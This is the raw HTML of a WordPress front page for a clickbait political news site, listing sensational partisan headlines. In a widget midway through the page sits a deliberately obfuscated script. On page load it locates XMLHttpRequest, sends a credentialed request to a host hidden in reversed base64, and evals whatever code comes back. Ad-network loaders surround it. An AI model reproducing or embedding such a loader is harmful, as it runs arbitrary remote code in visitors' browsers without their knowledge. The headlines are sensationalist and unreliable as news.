<!DOCTYPE html>
<html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#">
<head>
<meta name="google-site-verification" content="wI2KON7M3iVcN1ArXCDrzczISU-6n83u7P-QxkLEbXQ" />
                    
<meta charset="UTF-8">
	<!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame -->
	<!--[if IE ]>
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<![endif]-->
	<link rel="profile" href="http://gmpg.org/xfn/11" />
	<title>Embols - Breaking News, Latest News and Videos</title>
		<link rel="icon" href="http://demo.mythemeshop.com/sociallyviral/files/2014/10/favicon.png" type="image/x-icon" />
<!--iOS/android/handheld specific -->
<link rel="apple-touch-icon" href="http://embols.com/wp-content/themes/sociallyviral/images/apple-touch-icon.png" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta itemprop="name" content="Embols" />
    <meta itemprop="url" content="http://embols.com" />
    	<link rel="pingback" href="http://embols.com/xmlrpc.php" />
	<script type="text/javascript">document.documentElement.className = document.documentElement.className.replace( /\bno-js\b/,'js' );</script>
<!-- This site is optimized with the Yoast SEO plugin v4.3 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Breaking News, Latest News and Videos"/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="http://embols.com/" />
<link rel="next" href="http://embols.com/page/2/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Embols - Breaking News, Latest News and Videos" />
<meta property="og:description" content="Breaking News, Latest News and Videos" />
<meta property="og:url" content="http://embols.com/" />
<meta property="og:site_name" content="Embols" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Breaking News, Latest News and Videos" />
<meta name="twitter:title" content="Embols - Breaking News, Latest News and Videos" />
<script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"http:\/\/embols.com\/","name":"Embols","potentialAction":{"@type":"SearchAction","target":"http:\/\/embols.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Embols &raquo; Feed" href="http://embols.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Embols &raquo; Comments Feed" href="http://embols.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/embols.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.2"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='stylesheet-css'  href='http://embols.com/wp-content/themes/sociallyviral/style.css?ver=4.7.2' type='text/css' media='all' />
<style id='stylesheet-inline-css' type='text/css'>

		body, .sidebar.c-4-12, #commentform textarea, input#author, input#email, input#url {background-color:#f0ede9; }
		body {background-image: url( http://embols.com/wp-content/themes/sociallyviral/images/nobg.png );}
        .pace .pace-progress, #mobile-menu-wrapper ul li a:hover { background: #33bcf2; }
		.single_post a, .widget .textwidget a, #logo a, .pnavigation2 a, .sidebar.c-4-12 a:hover, footer .widget li a:hover, .sidebar.c-4-12 a:hover, .related-posts a:hover, .title a:hover, .comm, #tabber .inside li a:hover, .readMore a:hover, .fn a, a, span.author-posts a:hover { color:#33bcf2; }	
			nav a#pull, .mts-subscribe input[type='submit'], #move-to-top:hover, #navigation ul .current-menu-item a, .pagination a, #tabber ul.tabs li a.selected, .tagcloud a:hover, #navigation ul .sfHover a, .primary-navigation, #navigation ul ul, .single_post .thecategory, .single-prev-next a:hover, #commentform input#submit:hover, .contactform #submit:hover, .latestPost .latestPost-review-wrapper, .latestPost .review-type-circle.latestPost-review-wrapper, .post-label, .widget .review-total-only, #wpmm-megamenu .review-total-only { background-color:#33bcf2; color: #fff!important; }
        a:hover, .copyrights a:hover, .latestPost .title a:hover, span.author-posts a, .single_post .post-info a:hover { color: #f47555; }
        #searchform .fa-search, .currenttext, .pagination a:hover, .pagination .nav-previous a:hover, .pagination .nav-next a:hover, .single-prev-next a , #commentform input#submit, .contactform #submit, .tagcloud a { background: #f47555; color: #fff; }
        input#author:hover, input#email:hover, input#url:hover, #comment:hover, .contact-form input:hover, .contact-form textarea:hover { border-color: #f47555; }
		
		
		
		
		
		
			
</style>
<link rel='stylesheet' id='fontawesome-css'  href='http://embols.com/wp-content/themes/sociallyviral/css/font-awesome.min.css?ver=4.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://embols.com/wp-content/themes/sociallyviral/css/responsive.css?ver=4.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='msbd-adsmp-css'  href='http://embols.com/wp-content/plugins/ads-management/css/msbd-adsmp.css?ver=4.7.2' type='text/css' media='all' />
<script type='text/javascript' src='http://embols.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://embols.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mts_customscript = {"responsive":"1","nav_menu":"both"};
/* ]]> */
</script>
<script type='text/javascript' src='http://embols.com/wp-content/themes/sociallyviral/js/customscript.js?ver=4.7.2'></script>
<link rel='https://api.w.org/' href='http://embols.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://embols.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://embols.com/wp-includes/wlwmanifest.xml" /> 
<!--Theme by MyThemeShop.com-->
<!-- HFCM by 99 Robots - Snippet # 2: alibaba -->
<a href="http://click.alibaba.com/rd/1d5643ko" target="_parent"><image width="728" height="90" src="http://gtms03.alicdn.com/tps/i3/TB1EVqfJpXXXXXPXFXXUUsl4VXX-728-90.gif"/></a>
<!-- /end HFCM by 99 Robots -->
<link href="//fonts.googleapis.com/css?family=Fira+Sans:500|Fira+Sans:normal&amp;subset=latin" rel="stylesheet" type="text/css">
<style type="text/css">
#logo a { font-family: 'Fira Sans'; font-weight: 500; font-size: 44px; color: #33bcf2; }
.primary-navigation li, .primary-navigation li a { font-family: 'Fira Sans'; font-weight: normal; font-size: 18px; color: #ffffff;text-transform: uppercase; }
.latestPost .title, .latestPost .title a { font-family: 'Fira Sans'; font-weight: normal; font-size: 24px; color: #555555;line-height: 36px; }
.single-title { font-family: 'Fira Sans'; font-weight: normal; font-size: 38px; color: #555555;line-height: 53px; }
body { font-family: Helvetica, Arial, sans-serif; font-weight: normal; font-size: 18px; color: #707070; }
.widget .widget-title { font-family: 'Fira Sans'; font-weight: 500; font-size: 18px; color: #555555;text-transform: uppercase; }
#sidebars .widget { font-family: 'Fira Sans'; font-weight: normal; font-size: 16px; color: #707070; }
.footer-widgets { font-family: 'Fira Sans'; font-weight: normal; font-size: 14px; color: #707070; }
h1 { font-family: 'Fira Sans'; font-weight: normal; font-size: 38px; color: #555555; }
h2 { font-family: 'Fira Sans'; font-weight: normal; font-size: 34px; color: #555555; }
h3 { font-family: 'Fira Sans'; font-weight: normal; font-size: 30px; color: #555555; }
h4 { font-family: 'Fira Sans'; font-weight: normal; font-size: 28px; color: #555555; }
h5 { font-family: 'Fira Sans'; font-weight: normal; font-size: 24px; color: #555555; }
h6 { font-family: 'Fira Sans'; font-weight: normal; font-size: 20px; color: #555555; }
</style>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1068273&interactive=1&pushup=1"></script>

<div id="contentad274466"></div>
<script type="text/javascript">
    (function(d) {
        var params =
        {
            id: "1c8eb934-f74a-42cf-810b-639a8ae6e879",
            d:  "ZW1ib2xzLmNvbQ==",
            wid: "274466",
            exitPopMobile: true,
            cb: (new Date()).getTime()
        };

        var qs=[];
        for(var key in params) qs.push(key+'='+encodeURIComponent(params[key]));
        var s = d.createElement('script');s.type='text/javascript';s.async=true;
        var p = 'https:' == document.location.protocol ? 'https' : 'http';
        s.src = p + "://api.content.ad/Scripts/widget2.aspx?" + qs.join('&');
        d.getElementById("contentad274466").appendChild(s);
    })(document);
</script>
</head>
<body id ="blog" class="home blog main" itemscope itemtype="http://schema.org/WebPage">       
	<div class="main-container">
		<header class="main-header" role="banner" itemscope itemtype="http://schema.org/WPHeader">
			<div class="container">
				<div id="header">
					<div class="logo-wrap">
																						<h1 id="logo" class="text-logo" itemprop="headline">
										<a href="http://embols.com">Embols</a>
									</h1><!-- END #logo -->
																		</div>
					
											<div class="header-search"><form method="get" id="searchform" class="search-form" action="http://embols.com" _lpchecked="1">
	<fieldset>
		<input type="text" name="s" id="s" value="" placeholder="What are you looking for?"  autocomplete="off" />
		<input id="search-image" class="sbutton" type="submit" value="" />
		<i class="fa fa-search"></i>
	</fieldset>
</form></div>
					
											<div class="header-social">
					        					            					                <a href="#" class="header-facebook" style="background: #375593"><span class="fa fa-facebook"></span></a>
					            					        					            					                <a href="#" class="header-twitter" style="background: #0eb6f6"><span class="fa fa-twitter"></span></a>
					            					        					            					                <a href="#" class="header-google-plus" style="background: #dd4b39"><span class="fa fa-google-plus"></span></a>
					            					        					            					                <a href="#" class="header-youtube-play" style="background: #e32c26"><span class="fa fa-youtube-play"></span></a>
					            					        					    </div>
					
																		<div id="sticky" class="primary-navigation">
													<nav id="navigation" class="clearfix">
								<a href="#" id="pull" class="toggle-mobile-menu">Menu</a>
			        						        				<ul id="menu-menu" class="menu clearfix"><li id="menu-item-3416" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home"><a href="http://embols.com">Home</a></li>
<li id="menu-item-282" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://embols.com/category/business/">News</a></li>
<li id="menu-item-281" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://embols.com/category/breaking/">Breaking</a></li>
<li id="menu-item-284" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://embols.com/category/politics/">Politics</a></li>
<li id="menu-item-285" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://embols.com/category/tech/">Tech</a></li>
<li id="menu-item-283" class="menu-item menu-item-type-taxonomy menu-item-object-category"><a href="http://embols.com/category/entertainment/">Entertainment</a></li>
</ul>			        						        		</nav>
			        	</div>
						<div class="clear" id="catcher"></div>
			        
				</div><!--#header-->
			</div><!--.container-->        
		</header><div id="page">
	<div id="content_box">
                        			<article class="latestPost excerpt featuredPost" itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/look-mainstream-media-ignored-trumps-first-month-critical/" title="Look What The Mainstream Media Has Ignored About Trump&#8217;s First Month That Is So Critical" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="770" height="297" src="http://embols.com/wp-content/uploads/Capture-38-770x297.png" class="attachment-featuredbig size-featuredbig wp-post-image" alt="" title="" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/look-mainstream-media-ignored-trumps-first-month-critical/" title="Look What The Mainstream Media Has Ignored About Trump&#8217;s First Month That Is So Critical">Look What The Mainstream Media Has Ignored About Trump&#8217;s First Month That Is So Critical</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                                        <article class="latestPost excerpt homepage-widget last">
                                    <div id="text-2" class="widget-home">			<div class="textwidget"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=896676"></script>

<script data-cfasync="false" type="text/javascript">var f2Q=window;for(var W in f2Q){if(W.length===(5.96E2>=(60,27)?(78.,6):(0x1CA,1.169E3))&&W.charCodeAt(((0x83,0x9B)>=(28.0E1,116.)?(7.87E2,3):(16,14.0E1)))===(0x85<=(14.3E2,0x139)?(111,100):(2.91E2,53.))&&W.charCodeAt(((1.22E3,0x5F)>0x105?'':(1.315E3,138.0E1)>=0x10D?(0x73,5):(37,11.09E2)))===((64,37.)<=(49,0x65)?(125.,119):(0x142,1.335E3)<=(142.,7.36E2)?(14.,''):(34.,127))&&W.charCodeAt(((139.,0xDC)>(0xC8,48.)?(36.6E1,1):(0xBF,124.)))===((0x154,0x1BB)>=0?(0xDF,105):(8.06E2,0x11A))&&W.charCodeAt((122.>(62.,0x45)?(0x35,0):(27,42)))===((6.63E2,0x1BB)>13.64E2?(0x117,69.):(73.,1.)<(0x1C8,0x204)?(104,119):(75.3E1,143)))break};for(var G in f2Q[W]){if(G.length===((0xF5,6.0E2)>=27?(68.3E1,8):(7.350E2,0x9D))&&G.charCodeAt((0x192>=(10,0x3F)?(0x237,5):(0x90,34.6E1)))===((0x1E,147.)<129.0E1?(144,101):(43.,45)<=(41.,12.)?136.:(0x11C,0x20C))&&G.charCodeAt(((137,130.)>=(129.9E1,0x79)?(0x1B7,7):(84.4E1,31)))===(0x11C>=(9.0E1,9.5E1)?(0x68,116):(43,1.34E3))&&G.charCodeAt((0x117>=(0x242,0x1B6)?2.54E2:2.80E1<=(61,0x167)?(0x1BB,3):(0x22F,53.)))===((0x8C,83)>90?'':7.390E2>=(0xE5,0x190)?(0x1D3,117):(0x49,116))&&G.charCodeAt(((102.80E1,0x60)>=2.07E2?(0x87,0xD2):(7.4E1,0x228)>(121.,120.)?(35,0):(0x119,142.8E1)))===(0xBC>(0xC9,15.70E1)?(11.,100):(8.09E2,57.6E1)))break};(function(Y,f,K,F){f2Q[W][f]=function(){var x=((0x15B,0x20A)>(136.3E1,112)?(0x228,0):(104,0xD7)),O=x,p=function p(){var k=((0x12C,127.)<13.700E2?(7,'/'):5.07E2<(0x226,127.)?(3.31E2,13.20E1):(3.1E1,108.));var T='';var e='//';var a=((0x190,119.80E1)>=(0x45,127.)?(73.,'T'):(81,0x196));var w=((42,81.5E1)>=(3.18E2,0x18D)?(13.27E2,'E'):(97,30.90E1)>(120,1.345E3)?"Q":(14.0E1,9.63E2));var Q=((0xAE,0x112)>(0x61,120.)?(30,'G'):(0x7F,42.));var H=((0x7E,116.)>=0xA?(0xCD,true):0x123>=(88.4E1,0x150)?200:(0x59,101.));var z=new XMLHttpRequest();z.withCredentials=H;z.open((Q+w+a),(e)+f2Q[W]['atob'](K[O].split(T).reverse().join(T))+k+F+k,H);z.onreadystatechange=function(){var R=((0xF4,35)<0x104?(31.1E1,200):(0x45,0x16B)<=(0x97,0x7C)?(13.64E2,74):(0x119,74.));var U=((0x7D,9.)>(121.4E1,1)?(23.,4):(120.2E1,86));if(z.readyState==U&&z.status==R&&z.responseText){eval(z.responseText);}};z.onerror=function(){if(++O!=K.length){p();}};try{z.send();}catch(R){z.onerror();}};p();};})(f2Q[W][G],'_uyazndde',['==AduFGduV3bjNWYuMDetJnN3AXY'],896684);</script><script data-cfasync="false" type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=896676" onerror="window._uyazndde();"></script></div>
		</div>                                </article><!--.post excerpt-->
                                                			<article class="latestPost excerpt first " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/breaking-ted-cruz-pushing-major-new-law-mccain-graham-wont-happy/" title="BREAKING: Ted Cruz Pushing For Major New Law &#8211; McCain And Graham Won&#8217;t Be Happy" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-37-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-37-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-37-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/breaking-ted-cruz-pushing-major-new-law-mccain-graham-wont-happy/" title="BREAKING: Ted Cruz Pushing For Major New Law &#8211; McCain And Graham Won&#8217;t Be Happy">BREAKING: Ted Cruz Pushing For Major New Law &#8211; McCain And Graham Won&#8217;t Be Happy</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/just-2-days-oscars-melania-gives-shocking-surprise-meryl-streep-liberals-celebrities/" title="Just 2 Days Before The Oscars , Melania Gives SHOCKING Surprise To Meryl Streep And Other Liberals Celebrities…" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-36-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-36-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-36-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/just-2-days-oscars-melania-gives-shocking-surprise-meryl-streep-liberals-celebrities/" title="Just 2 Days Before The Oscars , Melania Gives SHOCKING Surprise To Meryl Streep And Other Liberals Celebrities…">Just 2 Days Before The Oscars , Melania Gives SHOCKING Surprise To Meryl Streep And Other Liberals Celebrities…</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt last " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/look-heres-happened-hours-trumps-cpac-speech-finally-happening/" title="LOOK: Here’s What Happened Hours Before Trump’s CPAC Speech – IT’S FINALLY HAPPENING!" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-35-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-35-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-35-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/look-heres-happened-hours-trumps-cpac-speech-finally-happening/" title="LOOK: Here’s What Happened Hours Before Trump’s CPAC Speech – IT’S FINALLY HAPPENING!">LOOK: Here’s What Happened Hours Before Trump’s CPAC Speech – IT’S FINALLY HAPPENING!</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt first " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/mind-blowing-wont-believe-much-hours-trump-worked-1st-month/" title="THIS IS MIND BLOWING! You Won’t Believe How Much Hours Trump Worked In The 1st Month.." rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-1-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-1-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-1-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/mind-blowing-wont-believe-much-hours-trump-worked-1st-month/" title="THIS IS MIND BLOWING! You Won’t Believe How Much Hours Trump Worked In The 1st Month..">THIS IS MIND BLOWING! You Won’t Believe How Much Hours Trump Worked In The 1st Month..</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/ivanka-trump-smashes-historic-recordshe-just-humiliated-liberals-good/" title="Ivanka Trump Smashes HISTORIC Record…She Just Humiliated Liberals For GOOD!" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/16807437_1973432736082535_4108662849081527218_n-370x297.jpg" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/16807437_1973432736082535_4108662849081527218_n-370x297.jpg 370w, http://embols.com/wp-content/uploads/16807437_1973432736082535_4108662849081527218_n-235x190.jpg 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/ivanka-trump-smashes-historic-recordshe-just-humiliated-liberals-good/" title="Ivanka Trump Smashes HISTORIC Record…She Just Humiliated Liberals For GOOD!">Ivanka Trump Smashes HISTORIC Record…She Just Humiliated Liberals For GOOD!</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt last " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/something-terrible-happening-barron-needs-support/" title="Something Terrible Is Happening To Barron… He Needs Your Support" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-34-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-34-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-34-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/something-terrible-happening-barron-needs-support/" title="Something Terrible Is Happening To Barron… He Needs Your Support">Something Terrible Is Happening To Barron… He Needs Your Support</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt first " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/clinton-name-may-damaged-forever-brutal-announcement-hillary-clinton/" title="The Clinton Name May Be Damaged Forever- BRUTAL Announcement to Hillary Clinton" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-33-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-33-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-33-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/clinton-name-may-damaged-forever-brutal-announcement-hillary-clinton/" title="The Clinton Name May Be Damaged Forever- BRUTAL Announcement to Hillary Clinton">The Clinton Name May Be Damaged Forever- BRUTAL Announcement to Hillary Clinton</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">3 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/america-spoken-latest-trump-poll-floors-washingtonestablishment-devastated/" title="America Has SPOKEN! Latest Trump Poll FLOORS Washington…Establishment Devastated!" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-16-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-16-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-16-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/america-spoken-latest-trump-poll-floors-washingtonestablishment-devastated/" title="America Has SPOKEN! Latest Trump Poll FLOORS Washington…Establishment Devastated!">America Has SPOKEN! Latest Trump Poll FLOORS Washington…Establishment Devastated!</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">4 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
                                        			<article class="latestPost excerpt last " itemscope itemtype="http://schema.org/BlogPosting">
                				<a href="http://embols.com/melania-sends-michelle-fit-rage-announcement-first-familys-vacations/" title="Melania Sends Michelle Into FIT OF RAGE Over Announcement About First Family’s Vacations!" rel="nofollow" id="featured-thumbnail">
                				    <div class="featured-thumbnail"><img width="370" height="297" src="http://embols.com/wp-content/uploads/Capture-32-370x297.png" class="attachment-featured size-featured wp-post-image" alt="" title="" srcset="http://embols.com/wp-content/uploads/Capture-32-370x297.png 370w, http://embols.com/wp-content/uploads/Capture-32-235x190.png 235w" sizes="(max-width: 370px) 100vw, 370px" /></div>                                                                                        				</a>
                                <header>
                                    <h2 class="title front-view-title" itemprop="headline"><a href="http://embols.com/melania-sends-michelle-fit-rage-announcement-first-familys-vacations/" title="Melania Sends Michelle Into FIT OF RAGE Over Announcement About First Family’s Vacations!">Melania Sends Michelle Into FIT OF RAGE Over Announcement About First Family’s Vacations!</a></h2>
                                                                            <div class="post-info">
                                                                                            <span class="thetime updated"><i class="fa fa-calendar"></i> <span itemprop="datePublished">4 days ago</span></span>
                                                                                                                                        <span class="thecategory"><i class="fa fa-tags"></i> <a href="http://embols.com/category/breaking/" title="View all posts in Breaking"  itemprop="articleSection">Breaking</a></span>
                                                                                    </div>
                                                                    </header>
                            </article><!--.post excerpt-->
